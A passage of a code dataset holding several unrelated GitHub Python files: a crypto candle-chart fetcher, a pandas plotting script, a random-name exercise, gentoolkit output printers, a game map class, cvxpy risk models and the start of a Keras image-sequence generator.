{"seq_id":"30683335453","text":"from . import requests\r\nimport datetime\r\nimport time\r\nimport math\r\nimport json\r\nimport os\r\n\r\n\r\nclass Chart:\r\n\tcandles = list()\r\n\t_pair = \"\"\r\n\t_width = \"\"\r\n\t_startTime = 0\r\n\t_endTime = 0\r\n\r\n\r\n\tdef __init__(self, pair, width, startTime=0, endTime=-1):\r\n\t\tself._pair = pair\r\n\t\tif Chart.widthToSec(width) < 900:\r\n\t\t\traise ValueError(\"Width must be no smaller than 15m\")\r\n\t\tself._width = width\r\n\t\tself._startTime = startTime\r\n\t\tif endTime == -1:\r\n\t\t\tself._endTime = time.time()\r\n\t\telse:\r\n\t\t\tself._endTime = endTime\r\n\t\tif self.checkUpdate():\r\n\t\t\tself._updateCandles()\r\n\t\tself._getCandles()\r\n\t\t\r\n\r\n\r\n\tdef _getCandles(self):\r\n\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"r\")\r\n\t\tfileStr = candlesFile.read()\r\n\t\tcandlesFile.close()\r\n\r\n\t\tif fileStr == None:\r\n\t\t\treturn\r\n\t\tcandles = json.loads(fileStr)\r\n\t\tif len(candles) == 0:\r\n\t\t\treturn\r\n\r\n\t\tstartIndex = math.ceil((self._startTime - candles[0][0]) / 900)\r\n\t\tendIndex = math.ceil((self._endTime - candles[0][0]) / 900)\r\n\r\n\t\tif startIndex < 0:\r\n\t\t\tstartIndex = 0\r\n\t\tif endIndex >= len(candles):\r\n\t\t\tendIndex = len(candles)\r\n\r\n\t\tif startIndex >= endIndex:\r\n\t\t\treturn []\r\n\r\n\t\tcandles = candles[startIndex:endIndex]\r\n\t\tif len(candles) < 2:\r\n\t\t\tself.candles = candles\r\n\t\telse:\r\n\t\t\tself.candles = self._convertCandles(candles, Chart.widthToSec(self._width))\r\n\r\n\r\n\r\n\tdef checkUpdate(self):\r\n\t\tfileStr = \"\"\r\n\t\ttry:\r\n\t\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"r\")\r\n\t\t\tfileStr = candlesFile.read()\r\n\t\t\tcandlesFile.close()\r\n\t\texcept FileNotFoundError as e:\r\n\t\t\tpass\r\n\r\n\t\tif fileStr != \"\":\r\n\t\t\tcandles = json.loads(fileStr)\r\n\t\t\tif len(candles) > 0 and self._endTime <= candles[-1][0]:\r\n\t\t\t\treturn False\r\n\r\n\t\treturn True\r\n\r\n\r\n\r\n\tdef _updateCandles(self):\r\n\t\tfileStr = \"\"\r\n\t\ttry:\r\n\t\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"r\")\r\n\t\t\tfileStr = candlesFile.read()\r\n\t\t\tcandlesFile.close()\r\n\t\texcept FileNotFoundError as e:\r\n\t\t\tpass\r\n\r\n\t\tcandles = list()\r\n\t\tstartTime = 0\r\n\t\tstartPrice = 0\r\n\t\tif fileStr != \"\":\r\n\t\t\tcandles = json.loads(fileStr)\r\n\t\t\tif len(candles) > 0:\r\n\t\t\t\tdel candles[-1]\r\n\t\t\t\tif len(candles) > 0:\r\n\t\t\t\t\tstartTime = candles[-1][0] + 900\r\n\t\t\t\t\tstartPrice = candles[-1][4]\r\n\t\t\t\r\n\t\twhile True:\r\n\t\t\tnewCandles = self._fetchCandles(self._pair, startPrice, startTime)\r\n\t\t\tif len(newCandles) == 0:\r\n\t\t\t\tbreak\r\n\t\t\tcandles += 
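The Combination Sum II record above relies on sort-then-skip deduplication: rejecting `candidates[i] == candidates[i-1]` for `i > index` prunes branches that would rebuild a combination already produced at the same recursion depth. A standalone, runnable rendering of the same method with a sample input (the original is a LeetCode `Solution` method, so this harness is assumed):

```python
from typing import List

def combination_sum2(candidates: List[int], target: int) -> List[List[int]]:
    # Standalone version of the method above, for quick experimentation.
    candidates.sort()
    res: List[List[int]] = []

    def backtrack(cur: List[int], index: int, remaining: int) -> None:
        if remaining <= 0:
            if remaining == 0:
                res.append(cur.copy())
            return
        for i in range(index, len(candidates)):
            # Skip a candidate equal to the previous one at the same depth.
            if i > index and candidates[i] == candidates[i - 1]:
                continue
            cur.append(candidates[i])
            backtrack(cur, i + 1, remaining - candidates[i])
            cur.pop()

    backtrack([], 0, target)
    return res

print(combination_sum2([10, 1, 2, 7, 6, 1, 5], 8))
# [[1, 1, 6], [1, 2, 5], [1, 7], [2, 6]]
```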
newCandles\r\n\t\t\tstartTime = candles[-1][0] + 900\r\n\t\t\tstartPrice = candles[-1][4]\r\n\r\n\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"w\")\r\n\t\tcandlesFile.write(str(candles))\r\n\t\tcandlesFile.close()\r\n\t\t\r\n\r\n\r\n\tdef _fetchCandles(self, pair, startPrice=0, startTime=0):\r\n\t\turl = \"/v2/candles/trade:15m:t\" + pair.replace(\"-\", \"\")\r\n\t\turl += \"/hist?limit=1000&sort=1&start=\" + str(startTime * 1000)\r\n\r\n\t\treq = requests.Requests()\r\n\t\tcandles = req.request(url)\r\n\t\tif candles == None:\r\n\t\t\treturn list()\r\n\r\n\t\tfor i in range(len(candles)):\r\n\t\t\tcandles[i] = [\r\n\t\t\t\tround(candles[i][0] / 1000),\r\n\t\t\t\tcandles[i][1],\r\n\t\t\t\tcandles[i][3],\r\n\t\t\t\tcandles[i][4],\r\n\t\t\t\tcandles[i][2],\r\n\t\t\t\tcandles[i][5]\r\n\t\t\t]\r\n\r\n\t\tif startTime == 0:\r\n\t\t\tstartTime = candles[0][0]\r\n\t\t\tstartPrice = candles[0][1]\r\n\r\n\t\tendTime = 0\r\n\t\tif len(candles) > 0:\r\n\t\t\tendTime = candles[-1][0]\r\n\t\t\t\r\n\t\treturn self._fillCandles(candles, startPrice, startTime, endTime + 900)\r\n\r\n\r\n\r\n\tdef _fillCandles(self, candles, startPrice, startTime, endTime):\r\n\t\tlastTime = startTime - 900\r\n\t\tlastPrice = startPrice\r\n\t\tnewCandles = list()\r\n\t\tfor i in range(len(candles)):\r\n\t\t\tthisTime = candles[i][0]\r\n\r\n\t\t\tfor j in range(lastTime + 900, thisTime, 900):\r\n\t\t\t\tnewCandles.append([j, lastPrice, lastPrice, lastPrice, lastPrice, 0])\r\n\t\t\tnewCandles.append(candles[i])\r\n\t\t\tlastTime = thisTime\r\n\t\t\tlastPrice = candles[i][4]\r\n\r\n\t\tfor i in range(lastTime + 900, endTime, 900):\r\n\t\t\tnewCandles.append([i, lastPrice, lastPrice, lastPrice, lastPrice, 0])\r\n\r\n\t\treturn newCandles\r\n\r\n\r\n\r\n\tdef _convertCandles(self, candles, newWidthSec):\r\n\t\tif len(candles) < 2:\r\n\t\t\treturn None\r\n\t\twidthSec = candles[1][0] - candles[0][0]\r\n\t\tif newWidthSec < widthSec or newWidthSec % widthSec != 0:\r\n\t\t\treturn None\r\n\r\n\t\tstartTime = math.ceil(candles[0][0] / newWidthSec) * newWidthSec\r\n\t\tstartIndex = int((startTime - candles[0][0]) / widthSec)\r\n\t\tstep = int(newWidthSec / widthSec)\r\n\t\tnewCandles = list()\r\n\t\tfor i in range(startIndex, len(candles), step):\r\n\t\t\thigh = candles[i][2]\r\n\t\t\tlow = candles[i][3]\r\n\t\t\tclose = 0\r\n\t\t\tvolume = 0\r\n\t\t\tfor j in range(step):\r\n\t\t\t\tif i + j >= len(candles):\r\n\t\t\t\t\tbreak\r\n\t\t\t\tif candles[i + j][2] > high:\r\n\t\t\t\t\thigh = candles[i + j][2]\r\n\t\t\t\tif candles[i + j][3] < low:\r\n\t\t\t\t\tlow = candles[i + j][3]\r\n\t\t\t\tclose = candles[i + j][4]\r\n\t\t\t\tvolume += candles[i + j][5]\r\n\t\t\tnewCandle = [candles[i][0], candles[i][1], high, low, close, volume]\r\n\t\t\tnewCandles.append(newCandle)\r\n\r\n\t\treturn newCandles\r\n\r\n\r\n\r\n\tdef _getCandlesPath(self, pair):\r\n\t\trelative = \"candles/\" + pair + \".json\"\r\n\t\treturn os.path.join(os.path.dirname(__file__), relative)\r\n\r\n\r\n\r\n\t@staticmethod\r\n\tdef widthToSec(width):\r\n\t\tif width[-1] == \"m\":\r\n\t\t\treturn int(width[:-1]) * 60\r\n\t\telif width[-1] == \"h\":\r\n\t\t\treturn int(width[:-1]) * 60 * 60\r\n\t\telif width[-1] == \"d\":\r\n\t\t\treturn int(width[:-1]) * 60 * 60 * 24\r\n\t\telse:\r\n\t\t\treturn int(width[:-1]) * 60 * 60 * 24 * 7\r\n\r\n\r\n\r\n\t@staticmethod\r\n\tdef secToWidth(sec):\r\n\t\tw = sec / (60 * 60 * 24 * 7)\r\n\t\tif int(w) == w:\r\n\t\t\treturn str(int(w)) + \"w\"\r\n\t\td = sec / (60 * 60 * 24)\r\n\t\tif int(d) == d:\r\n\t\t\treturn 
str(int(d)) + \"d\"\r\n\t\th = sec / (60 * 60)\r\n\t\tif int(h) == h:\r\n\t\t\treturn str(int(h)) + \"h\"\r\n\r\n\t\treturn str(int(sec / 60)) + \"m\"","repo_name":"Colman/Trading","sub_path":"exchange/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"29143894179","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nif __name__ == \"__main__\":\n\n\tobras = pd.read_csv(\"obras.csv\")\n\t\n\tobras['Numero'] = obras['Numero'].astype(\"Int64\")\n\tobras['Comuna'] = obras['Comuna'].astype(\"Int64\")\n\tobras['Longitud'] = obras['Longitud'].astype(\"float64\")\n\tobras['Latitud'] = obras['Latitud'].astype(\"float64\")\n\tobras['MetrosCuadrados'] = obras['MetrosCuadrados'].astype(\"float64\")\n\t\n\t#Latitud and Longitud\n\tprint (\"The mean of Longitud is: \" + str(obras[\"Longitud\"].mean()))\n\tprint (\"The mean of Latitud is: \" + str(obras[\"Latitud\"].mean()))\n\n\tprint (\"The difference between the means is: \" + str(obras[\"Longitud\"].mean() - obras[\"Latitud\"].mean()))\n\n\tplt.figure(figsize=(16, 10), dpi= 80, facecolor='w', edgecolor='k')\n\tplt.scatter('Longitud', 'Latitud', \n            data=obras[[\"Longitud\",\"Latitud\"]], \n            s=20)\n\tplt.xticks(fontsize=12); plt.yticks(fontsize=12)\n\tplt.title(\"Scatter of Longitud vs Latitud\", fontsize=22)\n\tplt.xlabel(\"Longitud\")\n\tplt.ylabel(\"Latitud\")\n\tplt.savefig('analisisBivariado/latitud-longitud.png') \n\tplt.cla()\n\tplt.clf()\n\n\t# Barrio and MetrosCuadrados\n\n\tbarrioMetros = obras[[\"Barrio\",\"MetrosCuadrados\"]]\n\tbarrioMetros = barrioMetros.groupby(['Barrio'])[\"MetrosCuadrados\"].sum()\n\tax = barrioMetros.plot.barh(x=\"MetrosCuadrados\", y= \"Barrio\", rot=0, figsize=(15,15), fontsize = 13, title= 'Total square meters per barrio')\n\tplt.legend(loc='upper right', fontsize=20)\n\tplt.savefig('analisisBivariado/barrio-metros.png') \n\tplt.cla()\n\tplt.clf()\n\n\t# Comuna and MetrosCuadrados\n\tcomunaMetros = obras[[\"Comuna\",\"MetrosCuadrados\"]]\n\tcomunaMetros = comunaMetros.groupby(['Comuna'])[\"MetrosCuadrados\"].sum()\n\tax = comunaMetros.plot.barh(x=\"MetrosCuadrados\", y= \"Comuna\", rot=0, figsize=(15,15), fontsize = 13, title= 'Total square meters per comuna')\n\tplt.legend(loc='upper right', fontsize=20)\n\tplt.savefig('analisisBivariado/comuna-metros.png') \n\tplt.cla()\n\tplt.clf()","repo_name":"dhsantos/Calidad-De-Datos","sub_path":"asignaciones/tp-final/analisis_bivariado.py","file_name":"analisis_bivariado.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"23582190207","text":"# Write a program that reads a number N and generates a file with N random names and ages\n# Use two hand-built lists: one containing 20 first names and another containing 20 surnames\n# Each line of the resulting file must contain a full name and the person's age\n# 2. 
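The `_convertCandles` routine in the chart.py record above aggregates 15-minute OHLCV candles into wider ones by hand: first open, max high, min low, last close, summed volume. For reference, the same aggregation is a one-liner in pandas, assuming a DataFrame with a DatetimeIndex (a sketch with toy values, not part of the repo):

```python
import pandas as pd

# Four 15-minute candles: open, high, low, close, volume.
idx = pd.date_range("2021-01-01 00:00", periods=4, freq="15min")
df = pd.DataFrame({"open": [1, 2, 3, 4], "high": [2, 3, 4, 5],
                   "low": [0, 1, 2, 3], "close": [2, 3, 4, 5],
                   "volume": [10, 20, 30, 40]}, index=idx)

hourly = df.resample("1h").agg({"open": "first", "high": "max",
                                "low": "min", "close": "last",
                                "volume": "sum"})
print(hourly)   # one 1-hour candle: open=1, high=5, low=0, close=5, volume=100
```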
Extend the registration example to also record the person's height\nimport random\nmy_file = open('arquivo.txt','a')\n\nfirst_name = [\"João\", \"Maria\", \"Pedro\", \"Ana\", \"Lucas\", \"Julia\", \"Fernanda\", \"Rafael\", \"Carolina\", \"Gabriel\",\n              \"Mariana\", \"Diego\", \"Camila\", \"Gustavo\", \"Larissa\", \"Rodrigo\", \"Beatriz\", \"Felipe\", \"Amanda\", \"Ricardo\"]\n\nlast_name = [\"Silva\", \"Santos\", \"Souza\", \"Oliveira\", \"Pereira\", \"Almeida\", \"Fernandes\", \"Rodrigues\", \"Costa\",\n             \"Gomes\", \"Martins\", \"Rocha\", \"Ribeiro\", \"Cardoso\", \"Nascimento\", \"Melo\", \"Carvalho\", \"Araujo\", \"Moreira\", \"Cavalcanti\"]\n\ndef main():\n    amount = int(input(\"Enter how many names to create:\"))\n\n    for i in range(amount):\n        name = first_name[random.randint(0,19)]\n        lname = last_name[random.randint(0,19)]\n        age = random.randint(0,118)\n        size = random.uniform(0.56,2.71)\n        my_file.write(f'{name} {lname} {age} years and {size:.2f}\n')\n\n    my_file.close()\n\nmain()","repo_name":"M0R4LL3Z/LaboratorioDeAlgoritmos2","sub_path":"Aula08/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"39816687134","text":"import time\n\nfrom gentoolkit import pprinter as pp\nfrom gentoolkit.formatters import CpvValueWrapper\nfrom gentoolkit.cpv import split_cpv\n\n\ndef nl(lines=1):\n    \"\"\"small utility function to print blank lines\n\n    @type lines: integer\n    @param lines: optional number of blank lines to print\n    default = 1\n    \"\"\"\n    print(\"\\n\" * lines)\n\n\nclass AnalysisPrinter(CpvValueWrapper):\n    \"\"\"Printing functions\"\"\"\n\n    def __init__(\n        self, target, verbose=True, references=None, key_width=1, width=None, prepend=\"\"\n    ):\n        \"\"\"@param references: list of accepted keywords or\n        the system use flags\n        \"\"\"\n        self.references = references\n        self.key_width = key_width\n        self.width = width\n        self.prepend = prepend\n        CpvValueWrapper.__init__(self, cpv_width=key_width, width=width)\n        self.set_target(target, verbose)\n\n    def set_target(self, target, verbose=True):\n        if target in [\"use\"]:\n            if verbose:\n                self.print_fn = self.print_use_verbose\n            else:\n                self.print_fn = self.print_use_quiet\n            self._format_key = self._format_use_keyword\n        elif target in [\"keywords\"]:\n            if verbose:\n                self.print_fn = self.print_keyword_verbose\n            else:\n                self.print_fn = self.print_keyword_quiet\n            self._format_key = self._format_use_keyword\n        elif target in [\"packages\"]:\n            if verbose:\n                self.print_fn = self.print_pkg_verbose\n            else:\n                self.print_fn = self.print_pkg_quiet\n            self._format_key = self._format_pkg\n\n    def __call__(self, key, active, data):\n        self._format_key(key, active, data)\n\n    def _format_use_keyword(self, key, active, pkgs):\n        \"\"\"Determines the stats for key, formats it and\n        calls the pre-determined print function\n        \"\"\"\n        occurred = str(len(pkgs))\n        if active in [\"-\", \"~\"]:\n            _key = active + key\n        else:\n            _key = key\n        if _key in self.references:\n            default = \"default\"\n        else:\n            default = \".......\"\n        count = \" \" * (5 - len(occurred)) + occurred\n        pkgs.sort()\n        self.print_fn(key, active, default, count, pkgs)\n\n    def print_use_verbose(self, key, active, default, count, pkgs):\n        \"\"\"Verbosely prints a set of use flag info. 
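On the name generator just above: indexing with `random.randint(0,19)` hard-codes the list length, so the program silently misbehaves if a name is added or removed. `random.choice` is the idiomatic, length-agnostic form — a sketch (list contents shortened here for brevity):

```python
import random

first_names = ["Ana", "Bruno", "Clara"]      # any length works
last_names = ["Silva", "Souza"]

def random_person() -> str:
    name = random.choice(first_names)        # no hard-coded index bound
    lname = random.choice(last_names)
    age = random.randint(0, 118)
    height = random.uniform(0.56, 2.71)
    return f"{name} {lname} {age} years and {height:.2f}"

print(random_person())
```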
including the pkgs\n using them.\n \"\"\"\n _pkgs = pkgs[:]\n if active in [\"+\", \"-\"]:\n _key = pp.useflag((active + key), active == \"+\")\n else:\n _key = \" \" + key\n cpv = _pkgs.pop(0)\n print(\n self.prepend + _key,\n \".\" * (35 - len(key)),\n default,\n pp.number(count),\n pp.cpv(cpv),\n )\n while _pkgs:\n cpv = _pkgs.pop(0)\n print(\" \" * 52 + pp.cpv(cpv))\n\n def print_use_quiet(self, key, active, default, count, pkgs):\n \"\"\"Quietly prints a subset set of USE flag info..\"\"\"\n if active in [\"+\", \"-\"]:\n _key = pp.useflag((active + key), active == \"+\")\n else:\n _key = \" \" + key\n print(self.prepend + _key, \".\" * (35 - len(key)), default, pp.number(count))\n\n def print_keyword_verbose(self, key, stability, default, count, pkgs):\n \"\"\"Verbosely prints a set of keywords info. including the pkgs\n using them.\n \"\"\"\n _pkgs = pkgs[:]\n _key = pp.keyword(\n (stability + key), stable=(stability == \" \"), hard_masked=stability == \"-\"\n )\n cpv = _pkgs.pop(0)\n print(\n self.prepend + _key,\n \".\" * (20 - len(key)),\n default,\n pp.number(count),\n pp.cpv(cpv),\n )\n while _pkgs:\n cpv = _pkgs.pop(0)\n print(\" \" * 37 + pp.cpv(cpv))\n\n def print_keyword_quiet(self, key, stability, default, count, pkgs):\n \"\"\"Quietly prints a subset set of USE flag info..\"\"\"\n _key = pp.keyword(\n (stability + key), stable=(stability == \" \"), hard_masked=stability == \"-\"\n )\n print(self.prepend + _key, \".\" * (20 - len(key)), default, pp.number(count))\n\n def _format_pkg(self, key, active, flags):\n \"\"\"Determines the stats for key, formats it and\n calls the pre-determined print function\n \"\"\"\n (plus, minus, cleaned) = flags\n _plus = []\n _minus = []\n _cleaned = []\n for flag in plus:\n _flag = flag.strip()\n if _flag:\n _plus.append(_flag)\n for flag in minus:\n _flag = flag.strip()\n if _flag:\n _minus.append(_flag)\n for flag in cleaned:\n _flag = flag.strip()\n if _flag:\n _cleaned.append(_flag)\n # print(\"cpv=\", key, \"_plus=\", _plus, \"_minus=\", _minus)\n self.print_fn(self.prepend + key, (plus, minus, cleaned))\n\n def print_pkg_verbose(self, cpv, flags):\n \"\"\"Verbosely prints the pkg's use flag info.\"\"\"\n (plus, minus, unset) = flags\n _flags = []\n for flag in plus:\n _flags.append(pp.useflag((flag), True))\n for flag in minus:\n _flags.append(pp.useflag((\"-\" + flag), False))\n for flag in unset:\n _flags.append(pp.globaloption(\"-\" + flag))\n\n print(self._format_values(cpv, \", \".join(_flags)))\n\n def print_pkg_quiet(self, cpv, flags):\n \"\"\"Verbosely prints the pkg's use flag info.\"\"\"\n (plus, minus, unset) = flags\n _flags = []\n for flag in plus:\n _flags.append(pp.useflag((flag), True))\n for flag in minus:\n _flags.append(pp.useflag((\"-\" + flag), False))\n for flag in unset:\n _flags.append(pp.globaloption(\"-\" + flag))\n\n print(self._format_values(cpv, \", \".join(_flags)))\n\n\nclass RebuildPrinter(CpvValueWrapper):\n \"\"\"Output functions\"\"\"\n\n def __init__(\n self, target, pretend=True, exact=False, slot=False, key_width=1, width=None\n ):\n \"\"\"@param references: list of accepted keywords or\n the system use flags\n \"\"\"\n self.target = target\n self.set_target(target)\n self.pretend = pretend\n CpvValueWrapper.__init__(self, cpv_width=key_width, width=width)\n if pretend:\n self.spacer = \" \"\n self.init_indent = len(self.spacer)\n else:\n self.spacer = \"\"\n self.exact = exact\n self.slot = slot\n self.data = {}\n\n def set_target(self, target):\n if target in [\"use\"]:\n self.print_fn = 
self.print_use\n elif target in [\"keywords\"]:\n self.print_fn = self.print_keyword\n elif target in [\"unmask\"]:\n self.print_fn = self.print_mask\n self.lines = [self.header()]\n\n def __call__(self, key, values, cp_count):\n if self.target in [\"keywords\", \"use\"]:\n self._format_atoms(key, values, cp_count)\n else:\n self._format_key(key, values)\n\n def _format_key(self, key, values):\n \"\"\"Determines the stats for key, formats it and\n calls the pre-determined print function\n \"\"\"\n if self.exact:\n _key = \"=\" + key\n else:\n parts = split_cpv(key)\n _key = \"/\".join(parts[:2])\n values.sort()\n self.data[_key] = values\n self.print_fn(_key, values)\n\n def print_use(self, key, atom=None, values=None):\n \"\"\"Prints a USE flag string.\"\"\"\n if atom and not values:\n values = atom.use\n if self.pretend:\n flags = []\n for flag in values:\n flags.append(pp.useflag(flag, (flag[0] != \"-\")))\n print(self._format_values(self.spacer + key, \" \".join(flags)))\n else:\n line = \" \".join([key, \" \".join(values)])\n self.lines.append(line)\n\n def _format_atoms(self, key, atoms, count):\n \"\"\"Determines if there are more than one atom in the values and\n calls the predetermined print function for each atom.\n \"\"\"\n # print(\"_format_atoms(),\", key, atoms)\n if self.exact:\n for atom in atoms:\n self.print_fn(str(atom), atom=atom)\n return\n # print(\"_format_atoms(), count =\", count)\n if self.slot or count > 1:\n for atom in atoms:\n _key = str(atom.cp) + \":\" + atom.slot\n self.print_fn(_key, atom=atom)\n else:\n for atom in atoms:\n _key = str(atom.cp)\n self.print_fn(_key, atom=atom)\n return\n\n def print_keyword(self, key, atom=None, keyword=None):\n \"\"\"prints a pkg key and a keyword\"\"\"\n # print(\"print_keyword(),\", key, keyword)\n if atom and not keyword:\n keyword = atom.keyword\n if self.pretend:\n print(self._format_values(key, keyword))\n else:\n line = \" \".join([key, keyword])\n self.lines.append(line)\n\n def print_unmask(self):\n pass\n\n def header(self):\n \"\"\"Generates a file header\"\"\"\n\n h = (\n \"# This package.%s file was generated by \" % self.target\n + \"gentoolkit's 'enalyze rebuild' module\\n\"\n \"# Date: \" + time.asctime() + \"\\n\"\n )\n return h\n","repo_name":"gentoo/gentoolkit","sub_path":"pym/gentoolkit/enalyze/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":9387,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"47"} +{"seq_id":"43298781845","text":"import os\nimport sys\nimport pygame\nimport random\n\nfrom constants import *\n\nclass Chapter(object):\n def __init__(self, inName, inMap, inStartingPos, inObstacles):\n\n self.name = inName\n self.startingPos = inStartingPos\n\n self.createMapFromStrings(inMap)\n self.obstacles = inObstacles\n\n def createMapFromStrings(self, inMap):\n self.map = []\n\n for y in range(len(inMap)):\n self.map.append([])\n for x in range(0, len(inMap[y]), 2):\n temp = inMap[y][x:x+2]\n self.map[y].append(temp)\n","repo_name":"Wopple/Mage","sub_path":"chapter.py","file_name":"chapter.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"21283794880","text":"from abc import abstractmethod\n\nimport cvxpy as cvx\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom optimizationCosts import BaseCost\n\n__all__ = ['FullSigma', 'RobustSigma']\n\n\ndef locator(obj, t):\n \"\"\"Picks last element before t.\"\"\"\n 
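Editor's note on `RebuildPrinter.set_target` in the gentoolkit record above: the `"unmask"` branch assigns `self.print_mask`, but the class only defines `print_unmask`, so selecting that target raises `AttributeError` at dispatch time. A dictionary dispatch both fixes the typo and fails fast on unknown targets — a sketch of the corrected method, with stub `print_*` methods standing in for the originals:

```python
class RebuildPrinterPatch:
    """Sketch of the corrected dispatch; the stubs mirror the original method names."""

    def print_use(self, *args): ...
    def print_keyword(self, *args): ...
    def print_unmask(self, *args): ...
    def header(self): return "# header\n"

    def set_target(self, target):
        dispatch = {
            "use": self.print_use,
            "keywords": self.print_keyword,
            "unmask": self.print_unmask,  # original wired self.print_mask: AttributeError
        }
        try:
            self.print_fn = dispatch[target]
        except KeyError:
            raise ValueError("unknown rebuild target: %r" % target)
        self.lines = [self.header()]
```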
try:\n if isinstance(obj, pd.Panel):\n return obj.iloc[obj.axes[0].get_loc(t, method='pad')]\n\n elif isinstance(obj.index, pd.MultiIndex):\n prev_t = obj.loc[:t, :].index.values[-1][0]\n else:\n return obj#.loc[prev_t, :]\n\n except AttributeError: # obj not pandas\n return obj\n\n\nclass BaseRiskModel(BaseCost):\n\n def __init__(self, **kwargs):\n self.w_bench = kwargs.pop('w_bench', 0.)\n super(BaseRiskModel, self).__init__()\n self.gamma_half_life = kwargs.pop('gamma_half_life', np.inf)\n\n def weight_expr(self, t, w_plus, z, value):\n self.expression = self._estimate(t, w_plus, z, value)\n return self.gamma * self.expression, []\n\n @abstractmethod\n def _estimate(self, t, w_plus, z, value):\n return NotImplemented\n\n def weight_expr_ahead(self, t, tau, w_plus, z, value):\n \"\"\"Estimate risk model at time tau in the future.\"\"\"\n if self.gamma_half_life == np.inf:\n gamma_multiplier = 1.\n else:\n decay_factor = 2 ** (-1 / self.gamma_half_life)\n # TODO not dependent on days\n gamma_init = decay_factor ** ((tau - t).days)\n gamma_multiplier = gamma_init * \\\n (1 - decay_factor) / (1 - decay_factor)\n return gamma_multiplier * self.weight_expr(t, w_plus, z, value)[0], []\n\n def optimization_log(self, t):\n if self.expression.value:\n return self.expression.value\n else:\n return np.NaN\n\n\nclass FullSigma(BaseRiskModel):\n \"\"\"Quadratic risk model with full covariance matrix.\n\n Args:\n Sigma (:obj:`pd.Panel`): Panel of Sigma matrices,\n or single matrix.\n\n \"\"\"\n\n def __init__(self, Sigma, **kwargs):\n self.Sigma = Sigma # Sigma is either a matrix or a pd.Panel\n try:\n assert(not pd.isnull(Sigma).values.any())\n except AttributeError:\n assert (not pd.isnull(Sigma).any())\n super(FullSigma, self).__init__(**kwargs)\n\n def _estimate(self, t, wplus, z, value):\n self.expression = cvx.quad_form(z, locator(self.Sigma, t+dt.timedelta(hours=1)).values) \n return self.expression\n\n\n\n\n\n\nclass RobustSigma(BaseRiskModel):\n \"\"\"Implements covariance forecast error risk.\"\"\"\n\n def __init__(self, Sigma, epsilon, **kwargs):\n self.Sigma = Sigma # pd.Panel or matrix\n self.epsilon = epsilon # pd.Series or scalar\n super(RobustSigma, self).__init__(**kwargs)\n\n def _estimate(self, t, wplus, z, value):\n testing=locator(self.Sigma, t)\n \n \n self.expression = cvx.quad_form(wplus, self.Sigma) + \\\n locator(self.epsilon, t) * \\\n (cvx.abs(wplus).T * np.diag(self.Sigma))**2\n\n return self.expression\n\n\n","repo_name":"ahmedaley/SpotWeb","sub_path":"SpotWeb/optimizationRisks.py","file_name":"optimizationRisks.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"2197419049","text":"import csv\nimport os\nimport glob\nimport warnings\n\nimport numpy as np\nimport keras.backend as K\nfrom keras.preprocessing.image import Iterator, load_img, img_to_array, ImageDataGenerator, \\\n transform_matrix_offset_center, apply_transform, random_channel_shift, flip_axis, array_to_img\n\nfrom thirdp.harvitronix.extract.csv_file_constats import CLASS_INDEX\n\nclass SequenceImageGenerator(object):\n \"\"\"Generate minibatches of image sequnces data (e.g. 
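`FullSigma._estimate` in the risk-model record above contributes a `cvx.quad_form(z, Sigma)` term to an optimization objective. For readers unfamiliar with the construct, here is a self-contained toy problem showing how such a quadratic risk term is typically traded off against a return term in cvxpy; the covariance, return vector, and long-only constraint are all invented for illustration:

```python
import cvxpy as cvx
import numpy as np

np.random.seed(0)
n = 4
A = np.random.randn(n, n)
Sigma = A @ A.T + n * np.eye(n)   # invented positive-definite covariance
mu = np.random.randn(n)           # invented expected returns
gamma = 5.0                       # risk-aversion weight, like self.gamma above

w = cvx.Variable(n)
risk = cvx.quad_form(w, Sigma)    # the same construct FullSigma._estimate builds
prob = cvx.Problem(cvx.Maximize(mu @ w - gamma * risk),
                   [cvx.sum(w) == 1, w >= 0])
prob.solve()
print(np.round(w.value, 3))       # risk-adjusted long-only weights
```

Incidentally, `weight_expr_ahead` above multiplies by `(1 - decay_factor) / (1 - decay_factor)`, which is identically 1; it reads like a leftover from a geometric-series sum.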
video sample) with real-time data augmentation.\n\n # Arguments\n featurewise_center: set input mean to 0 over the dataset.\n samplewise_center: set each sample mean to 0.\n featurewise_std_normalization: divide inputs by std of the dataset.\n samplewise_std_normalization: divide each input by its std.\n zca_whitening: apply ZCA whitening.\n zca_epsilon: epsilon for ZCA whitening. Default is 1e-6.\n rotation_range: degrees (0 to 180).\n width_shift_range: fraction of total width.\n height_shift_range: fraction of total height.\n shear_range: shear intensity (shear angle in radians).\n zoom_range: amount of zoom. if scalar z, zoom will be randomly picked\n in the range [1-z, 1+z]. A sequence of two can be passed instead\n to select this range.\n channel_shift_range: shift range for each channels.\n fill_mode: points outside the boundaries are filled according to the\n given mode ('constant', 'nearest', 'reflect' or 'wrap'). Default\n is 'nearest'.\n cval: value used for points outside the boundaries when fill_mode is\n 'constant'. Default is 0.\n horizontal_flip: whether to randomly flip images horizontally.\n vertical_flip: whether to randomly flip images vertically.\n rescale: rescaling factor. If None or 0, no rescaling is applied,\n otherwise we multiply the data by the value provided. This is\n applied after the `preprocessing_function` (if any provided)\n but before any other transformation.\n preprocessing_function: function that will be implied on each input.\n The function will run before any other modification on it.\n The function should take one argument:\n one image (Numpy tensor with rank 3),\n and should output a Numpy tensor with the same shape.\n data_format: 'channels_first' or 'channels_last'. In 'channels_first' mode, the channels dimension\n (the depth) is at index 1, in 'channels_last' mode it is at index 3.\n It defaults to the `image_data_format` value found in your\n Keras config file at 